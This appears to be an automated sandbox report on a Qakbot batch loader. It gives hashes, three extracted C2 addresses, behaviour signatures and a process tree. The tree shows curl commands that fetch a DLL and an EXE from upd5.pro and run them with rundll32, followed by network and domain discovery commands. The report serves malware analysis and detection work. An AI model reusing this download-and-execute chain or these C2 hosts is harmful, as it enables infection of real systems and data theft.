Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-04-2024 01:22

General

  • Target

    u2.bat

  • Size

    326B

  • MD5

    acaf01f83da439915027c3e2e900c8dd

  • SHA1

    2861b4e463fa89e05f2d7d629fae5140cef49843

  • SHA256

    3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d

  • SHA512

    dc33e9b7e2dde66a3793955899221513e1f7b156801f1cc56eb48ad5cbf2b8c4facf8ad33c5bd63e4ec607e95e8b909f4bc280aaca4e29f07883879ec97a3e61

Malware Config

Extracted

Family

qakbot

Botnet

tchk08

Campaign

1710958492

C2

77.105.162.176:995

31.210.173.10:443

5.252.177.195:443

Attributes
  • camp_date

    2024-03-20 18:14:52 +0000 UTC

Signatures

  • Detect Qakbot Payload 56 IoCs
  • Qakbot/Qbot

    Qbot or Qakbot is a sophisticated worm with banking capabilities.

  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 28 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\u2.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5080
    • C:\Windows\system32\curl.exe
      curl -o 02.dll https://upd5.pro/update/02.dll
      2⤵
        PID:3032
      • C:\Windows\system32\rundll32.exe
        rundll32.exe 02.dll,checkit
        2⤵
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:3112
        • C:\Windows\System32\wermgr.exe
          C:\Windows\System32\wermgr.exe
          3⤵
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2924
          • C:\Windows\System32\ipconfig.exe
            ipconfig /all
            4⤵
            • Gathers network information
            PID:4680
          • C:\Windows\System32\whoami.exe
            whoami /all
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2092
          • C:\Windows\System32\nltest.exe
            nltest /domain_trusts /all_trusts
            4⤵
              PID:208
            • C:\Windows\System32\qwinsta.exe
              qwinsta
              4⤵
                PID:948
          • C:\Windows\system32\curl.exe
            curl -o qd_x86.exe https://upd5.pro/update/qd_x86.exe
            2⤵
              PID:1912
            • C:\Windows\system32\PING.EXE
              ping -n 5 localhost
              2⤵
              • Runs ping.exe
              PID:2368
            • C:\Users\Admin\AppData\Local\Temp\qd_x86.exe
              qd_x86.exe
              2⤵
              • Executes dropped EXE
              PID:1856
          • C:\Windows\system32\msiexec.exe
            C:\Windows\system32\msiexec.exe /V
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2604

          Network

          MITRE ATT&CK Matrix ATT&CK v13

          Execution

          Command and Scripting Interpreter

          1
          T1059

          Discovery

          System Information Discovery

          1
          T1082

          Remote System Discovery

          1
          T1018

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\02.dll
            Filesize

            3.5MB

            MD5

            4b7b85d70329e085ab06dcdf9557b0a0

            SHA1

            3a277203cb4916eb1f55f867f0bd368476c613fb

            SHA256

            49220571574da61781de37f35c66e8f0dadb18fdedb6d3a1be67485069cfd4b0

            SHA512

            50087b509b58a50db0a67f2aea2838c2783fb2d1d6f5a22d3a68b31e0cdfa7b3b5d469df16af437a6396d3f8dc75fafd689f9af9ce72bfb0c541a3f37ef77f03

          • C:\Users\Admin\AppData\Local\Temp\qd_x86.exe
            Filesize

            522KB

            MD5

            31b1a881401e0ba0cad4c56f1e32c48e

            SHA1

            19e491a4c69de056c77d05ba671870818d4f7f80

            SHA256

            7215d9421e0a6d1a7cfde3f6d742670550fed009585ab35b53cbb845f63c5f74

            SHA512

            459d6e38e633f22877add0b862319aa65484a015225e24cfea64d3bbebcde171d75857c063033035897a1d848b7c87833d0e3581d57558c0663b433db8b0154c

          • memory/2924-57-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-82-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-101-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-100-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-58-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-99-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-98-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-15-0x0000023A75D40000-0x0000023A75D42000-memory.dmp
            Filesize

            8KB

          • memory/2924-16-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-97-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-96-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-24-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-95-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-27-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-25-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-36-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-37-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-38-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-39-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-40-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-92-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-46-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-49-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-50-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-59-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-52-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-53-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-56-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-91-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-90-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-51-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-64-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-65-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-66-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-67-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-70-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-71-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-72-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-73-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-76-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-77-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-78-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-79-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-89-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-83-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-85-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/2924-86-0x0000023A75D10000-0x0000023A75D3F000-memory.dmp
            Filesize

            188KB

          • memory/3112-8-0x0000028D0E0F0000-0x0000028D0E11F000-memory.dmp
            Filesize

            188KB

          • memory/3112-11-0x0000028D0E0F0000-0x0000028D0E11F000-memory.dmp
            Filesize

            188KB

          • memory/3112-9-0x0000028D0E090000-0x0000028D0E0BD000-memory.dmp
            Filesize

            180KB

          • memory/3112-4-0x0000028D0E0C0000-0x0000028D0E0EF000-memory.dmp
            Filesize

            188KB

          • memory/3112-26-0x0000028D0E0F0000-0x0000028D0E11F000-memory.dmp
            Filesize

            188KB

          • memory/3112-23-0x0000028D0E0F0000-0x0000028D0E11F000-memory.dmp
            Filesize

            188KB

          • memory/3112-22-0x0000028D0E0F0000-0x0000028D0E11F000-memory.dmp
            Filesize

            188KB

          • memory/3112-13-0x0000028D0E0F0000-0x0000028D0E11F000-memory.dmp
            Filesize

            188KB

          • memory/3112-14-0x0000028D0E0F0000-0x0000028D0E11F000-memory.dmp
            Filesize

            188KB

          • memory/3112-12-0x0000028D0E0F0000-0x0000028D0E11F000-memory.dmp
            Filesize

            188KB

          • memory/3112-3-0x0000028D0E090000-0x0000028D0E0BD000-memory.dmp
            Filesize

            180KB